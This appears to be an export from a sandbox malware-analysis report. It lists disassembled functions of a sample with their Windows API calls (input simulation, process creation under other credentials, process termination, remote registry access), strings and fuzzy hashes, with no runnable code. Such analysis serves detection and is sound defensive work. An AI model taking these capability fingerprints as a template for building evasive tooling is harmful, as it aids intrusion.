Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Rect$Client$Window$MetricsScreenSystem
String ID:
API String ID: 3220332590-0
Opcode ID: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
Instruction ID: ecf7ff502c6b78148f03942a1c434a0e9921503e18d71a106d436fd17226c11c
Opcode Fuzzy Hash: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
Instruction Fuzzy Hash: A8A1F4A6B16243C6E726AF31D4047BDB3A0FB05F58F551135EF1947AA8FA3D9841D320

Function 00007FF7A51CA054 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 492COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51CA08F
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51CA460
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51CA701

Strings

p, xrefs: 00007FF7A51CA19C
f, xrefs: 00007FF7A51CA194

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$p
API String ID: 3215553584-1290815066
Opcode ID: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
Instruction ID: ffbbf5764394502372888fc74cdbae207d4ec7b1de20262463644a5ad6dbc601
Opcode Fuzzy Hash: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
Instruction Fuzzy Hash: 2A127722E1E25386FB23BB14F044579E661EB42F54FD54231D69906AECDB3FE980DB20

Function 00007FF7A520AD30 Relevance: 9.2, APIs: 6, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00007FF7A520AD45
VariantClear.OLEAUT32 ref: 00007FF7A520ADCA
VariantCopy.OLEAUT32 ref: 00007FF7A520ADD6
VariantClear.OLEAUT32 ref: 00007FF7A520ADE1
SysAllocString.OLEAUT32 ref: 00007FF7A520AE11
VariantCopy.OLEAUT32 ref: 00007FF7A520AE73

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: e8b24930f51ba047eb7d77df0b47a13309a91a72afe8362d3ff3918905f513c3
Instruction ID: 7f2677fb01b7c98e12fe96c8924c56c5e1101ebac7a0aebfc8e16273a4acb4c1
Opcode Fuzzy Hash: e8b24930f51ba047eb7d77df0b47a13309a91a72afe8362d3ff3918905f513c3
Instruction Fuzzy Hash: 52714FB1A1B24281EA29BB25995807CE264FF46F80FD64035D74E0B7F9DF2DED518720

Function 00007FF7A521D1F0 Relevance: 9.1, APIs: 6, Instructions: 131filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A521CA34: GetFullPathNameW.KERNEL32 ref: 00007FF7A521CA62

Part of subcall function 00007FF7A521CA34: GetFullPathNameW.KERNEL32 ref: 00007FF7A521CA77

Part of subcall function 00007FF7A521CED4: GetFileAttributesW.KERNEL32 ref: 00007FF7A521CED8

lstrcmpiW.KERNEL32 ref: 00007FF7A521D277
MoveFileW.KERNEL32 ref: 00007FF7A521D2AA
wcscat.LIBCMT ref: 00007FF7A521D2FB
wcscat.LIBCMT ref: 00007FF7A521D30E
wcscat.LIBCMT ref: 00007FF7A521D324
SHFileOperationW.SHELL32 ref: 00007FF7A521D43E

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Filewcscat$FullNamePath$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 564229958-0
Opcode ID: 35062434fee54acf94d2c2a036a69dc928caf6f380b06f8f0a879a9cbd16691f
Instruction ID: d52c3024032d6d4654a7a398302a4afa64907f9bc4d4f241aad2d88fd99014f8
Opcode Fuzzy Hash: 35062434fee54acf94d2c2a036a69dc928caf6f380b06f8f0a879a9cbd16691f
Instruction Fuzzy Hash: C2516272A15A8295EB21EF60EC402FAA364FF91F84FC10032E64C576AEDFA8D645C750

Function 00007FF7A51AD4CC Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 119COMMON

Download Yara Rule

Strings

True, xrefs: 00007FF7A51F9C97
%.15g, xrefs: 00007FF7A51AD554
0x%p, xrefs: 00007FF7A51F9CB4
False, xrefs: 00007FF7A51F9C90

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID:
String ID: %.15g$0x%p$False$True
API String ID: 0-2263619337
Opcode ID: e719f584031d415f058583bc3760330c0d061c7a3d1d344f28d0a5967c239e6c
Instruction ID: 4e8f5393d1db2d6cc9348d17acf54642ca787b71e53cd3b296d1d793383c1f09
Opcode Fuzzy Hash: e719f584031d415f058583bc3760330c0d061c7a3d1d344f28d0a5967c239e6c
Instruction Fuzzy Hash: AC51D372B0AA4285EB22FB64F0401BCA365EB46F88F964532DB0E477BDDE39D405C360

Function 00007FF7A51A1E04 Relevance: 9.1, APIs: 6, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A2A54: GetWindowLongPtrW.USER32 ref: 00007FF7A51A2A71

BeginPaint.USER32 ref: 00007FF7A51A1E4C
GetWindowRect.USER32 ref: 00007FF7A51A1EB7
ScreenToClient.USER32 ref: 00007FF7A51A1EDE
SetViewportOrgEx.GDI32 ref: 00007FF7A51A1EF9
EndPaint.USER32 ref: 00007FF7A51A1F5A
Rectangle.GDI32 ref: 00007FF7A51EA458

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
Instruction ID: 81e2ca5aba2b1a4c075ea4ba898bf820b9ddc6328e5614c231d1b2288d77706b
Opcode Fuzzy Hash: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
Instruction Fuzzy Hash: 7351BE72A0A682C6E721EB15E8487B9B760FB4AF94F864135DF5D03BA9CF3DE4058710

Function 00007FF7A5234C58 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00007FF7A5234C71

Part of subcall function 00007FF7A5230374: GetWindowRect.USER32 ref: 00007FF7A5230389

GetDesktopWindow.USER32 ref: 00007FF7A5234C93
GetWindowRect.USER32 ref: 00007FF7A5234CA0
mouse_event.USER32 ref: 00007FF7A5234CE6

Part of subcall function 00007FF7A521D7F8: QueryPerformanceCounter.KERNEL32 ref: 00007FF7A521D811
Part of subcall function 00007FF7A521D7F8: QueryPerformanceFrequency.KERNEL32 ref: 00007FF7A521D820
Part of subcall function 00007FF7A521D7F8: Sleep.KERNEL32 ref: 00007FF7A521D828
Part of subcall function 00007FF7A521D7F8: QueryPerformanceCounter.KERNEL32 ref: 00007FF7A521D833

GetCursorPos.USER32(?,?), ref: 00007FF7A5234D1A
mouse_event.USER32 ref: 00007FF7A5234D87

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Window$PerformanceQuery$CounterRectmouse_event$CursorDesktopForegroundFrequencySleep
String ID:
API String ID: 383626216-0
Opcode ID: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
Instruction ID: 02b955ce06d097ae973c419a84463c6764a8b1cd1ecc6ad176b52cb1f02b329c
Opcode Fuzzy Hash: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
Instruction Fuzzy Hash: 0C31D073B056528BE314DF21D8847AC73A1FB9AB58F810235EE0A53AA8DF3DE945C750

Function 00007FF7A520D2C4 Relevance: 9.1, APIs: 6, Instructions: 77processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7A520D2AB), ref: 00007FF7A520D31F
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00007FF7A520D2AB), ref: 00007FF7A520D335
CreateEnvironmentBlock.USERENV(?,?,?,?,?,?,?,?,?,?,?,00007FF7A520D2AB), ref: 00007FF7A520D34E
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7A520D2AB), ref: 00007FF7A520D35E
CreateProcessWithLogonW.ADVAPI32 ref: 00007FF7A520D3CA
DestroyEnvironmentBlock.USERENV ref: 00007FF7A520D3E3

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
Instruction ID: 18e923b6f0f0a8205fe4e517ab81768e02cc301581d0916d26eb1c6ca8783ce6
Opcode Fuzzy Hash: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
Instruction Fuzzy Hash: 42318E7270AB8586D7649F12E8807AAB7A4FB89F90F454036DE8D03768CF3DD445CB10

Function 00007FF7A51D1E74 Relevance: 9.1, APIs: 6, Instructions: 56threadCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51D1E90
CreateThread.KERNEL32 ref: 00007FF7A51D1ED4
GetLastError.KERNEL32 ref: 00007FF7A51D1EE2
CloseHandle.KERNEL32 ref: 00007FF7A51D1F01
FreeLibrary.KERNEL32 ref: 00007FF7A51D1F10
ResumeThread.KERNEL32 ref: 00007FF7A51D1F33

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
String ID:
API String ID: 2082702847-0
Opcode ID: 61ceddc5787947a58d9fe000786d9d3995f6ca174d30162394f7b26a0e686deb
Instruction ID: ff642befd93847b626513576a3e2bc82d3cf35dd42bee266c5c20dba4a487104
Opcode Fuzzy Hash: 61ceddc5787947a58d9fe000786d9d3995f6ca174d30162394f7b26a0e686deb
Instruction Fuzzy Hash: E0219222A4B74285EE16AB60F440278E290AF46FB4F960734DA2D063FDDF3CE4488620

Function 00007FF7A5212240 Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7A521226B
GetDeviceCaps.GDI32 ref: 00007FF7A521227C
GetDeviceCaps.GDI32 ref: 00007FF7A521228C
ReleaseDC.USER32 ref: 00007FF7A5212299
MulDiv.KERNEL32 ref: 00007FF7A52122AC
MulDiv.KERNEL32 ref: 00007FF7A52122BE

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: db491a3267b275339f548d81dbee8ecebd291c24a581f1a9e6271a89bb132f3c
Instruction ID: a96cf01dd354801fb1e63d7e987604dc93e50a3cd9eafd7757dd682e4c52171e
Opcode Fuzzy Hash: db491a3267b275339f548d81dbee8ecebd291c24a581f1a9e6271a89bb132f3c
Instruction Fuzzy Hash: 7111A375B1670182EB08DB62AC0403DA6A1FF49FC1F928438DF0E47BA8DE3EE8018700

Function 00007FF7A52509FC Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A51A2370: ExtCreatePen.GDI32 ref: 00007FF7A51A23FF
Part of subcall function 00007FF7A51A2370: SelectObject.GDI32 ref: 00007FF7A51A2412
Part of subcall function 00007FF7A51A2370: BeginPath.GDI32 ref: 00007FF7A51A242B
Part of subcall function 00007FF7A51A2370: SelectObject.GDI32 ref: 00007FF7A51A2452

MoveToEx.GDI32 ref: 00007FF7A5250A3F
LineTo.GDI32 ref: 00007FF7A5250A4E
MoveToEx.GDI32 ref: 00007FF7A5250A60
LineTo.GDI32 ref: 00007FF7A5250A6F
EndPath.GDI32 ref: 00007FF7A5250A81
StrokePath.GDI32 ref: 00007FF7A5250A91

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
Instruction ID: 8fbfdc94fbc84ec40ba07c630bdf729e327f6700815a84e619b5fc30dbbe992a
Opcode Fuzzy Hash: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
Instruction Fuzzy Hash: A711C171B1528282E714AB25BC04B68BB60EF97F94F898130CF0603BA8DF7EE444CB50

Function 00007FF7A51C2D5C Relevance: 9.0, APIs: 6, Instructions: 39keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(?,?,?,00007FF7A51A7FA5), ref: 00007FF7A51C2D8E
MapVirtualKeyW.USER32(?,?,?,00007FF7A51A7FA5), ref: 00007FF7A51C2D9C
MapVirtualKeyW.USER32(?,?,?,00007FF7A51A7FA5), ref: 00007FF7A51C2DAC
MapVirtualKeyW.USER32(?,?,?,00007FF7A51A7FA5), ref: 00007FF7A51C2DBC
MapVirtualKeyW.USER32(?,?,?,00007FF7A51A7FA5), ref: 00007FF7A51C2DCA
MapVirtualKeyW.USER32(?,?,?,00007FF7A51A7FA5), ref: 00007FF7A51C2DD8

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
Instruction ID: e647ce854b622878ef3a8e5adf70b9939d97df25fe41f3f1c6984e90c06e1336
Opcode Fuzzy Hash: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
Instruction Fuzzy Hash: 74113062A07640CAD348DF39DC481197BB2FB69F08B958034C2498F2B5EE7D949AC710

Function 00007FF7A521DA1C Relevance: 9.0, APIs: 6, Instructions: 34windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 00007FF7A521DA2F
SendMessageTimeoutW.USER32 ref: 00007FF7A521DA5C
GetWindowThreadProcessId.USER32 ref: 00007FF7A521DA6F
OpenProcess.KERNEL32 ref: 00007FF7A521DA81
TerminateProcess.KERNEL32 ref: 00007FF7A521DA8F
CloseHandle.KERNEL32 ref: 00007FF7A521DA98

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
Instruction ID: 989d70460f95ca4849a94e0d4e5a84c101ab16ef838b9d0565f3ccb635c90572
Opcode Fuzzy Hash: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
Instruction Fuzzy Hash: E3018FB2B1674183EB14EB21FC04A29B361FF9AF95F855034CA0E06BA8DF7CD1488B00

Function 00007FF7A520F378 Relevance: 9.0, APIs: 6, Instructions: 33threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32 ref: 00007FF7A520F3A8
GetWindowThreadProcessId.USER32 ref: 00007FF7A520F3B8
GetCurrentThreadId.KERNEL32 ref: 00007FF7A520F3C0
GetWindowThreadProcessId.USER32 ref: 00007FF7A520F3D0
GetCurrentThreadId.KERNEL32 ref: 00007FF7A520F3D8
AttachThreadInput.USER32 ref: 00007FF7A520F3E5

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
String ID:
API String ID: 179993514-0
Opcode ID: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
Instruction ID: 87aebb587228aaf4f7d188a8abd4141cb7ce508423cce6229523ec51eb2969a4
Opcode Fuzzy Hash: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
Instruction Fuzzy Hash: F2F0A4A1F1B75143F754AB71AC49629A291BF99F45FC54034D90E02BF8DF3DE4848710

Function 00007FF7A520D868 Relevance: 9.0, APIs: 6, Instructions: 22memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF7A520D877
UnloadUserProfile.USERENV ref: 00007FF7A520D885
CloseHandle.KERNEL32 ref: 00007FF7A520D88F
CloseHandle.KERNEL32 ref: 00007FF7A520D898
GetProcessHeap.KERNEL32 ref: 00007FF7A520D89E
HeapFree.KERNEL32 ref: 00007FF7A520D8AC

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
Instruction ID: d696b674aef3a6fb64ae078d64da371b4c2548c1720b88a236e7b4d82eea4d0b
Opcode Fuzzy Hash: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
Instruction Fuzzy Hash: 85F0ACA5B16A0182EB04EF76DC94029A361EF99FA5B855131CD1E863B8CE3DD4958310

Function 00007FF7A5237E38 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A520B748: CLSIDFromProgID.OLE32 ref: 00007FF7A520B771
Part of subcall function 00007FF7A520B748: ProgIDFromCLSID.OLE32 ref: 00007FF7A520B790
Part of subcall function 00007FF7A520B748: lstrcmpiW.KERNEL32 ref: 00007FF7A520B7A2
Part of subcall function 00007FF7A520B748: CoTaskMemFree.OLE32 ref: 00007FF7A520B7B4

Part of subcall function 00007FF7A520C034: WNetAddConnection2W.MPR ref: 00007FF7A520C143
Part of subcall function 00007FF7A520C034: RegConnectRegistryW.ADVAPI32 ref: 00007FF7A520C164
Part of subcall function 00007FF7A520C034: RegOpenKeyExW.ADVAPI32 ref: 00007FF7A520C193
Part of subcall function 00007FF7A520C034: RegQueryValueExW.ADVAPI32 ref: 00007FF7A520C1CD

CoInitializeSecurity.OLE32 ref: 00007FF7A5237F26
CoCreateInstanceEx.OLE32 ref: 00007FF7A52380C6
CoTaskMemFree.OLE32 ref: 00007FF7A52380D2
CoSetProxyBlanket.OLE32 ref: 00007FF7A523812B

Strings

NULL Pointer assignment, xrefs: 00007FF7A5238148

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

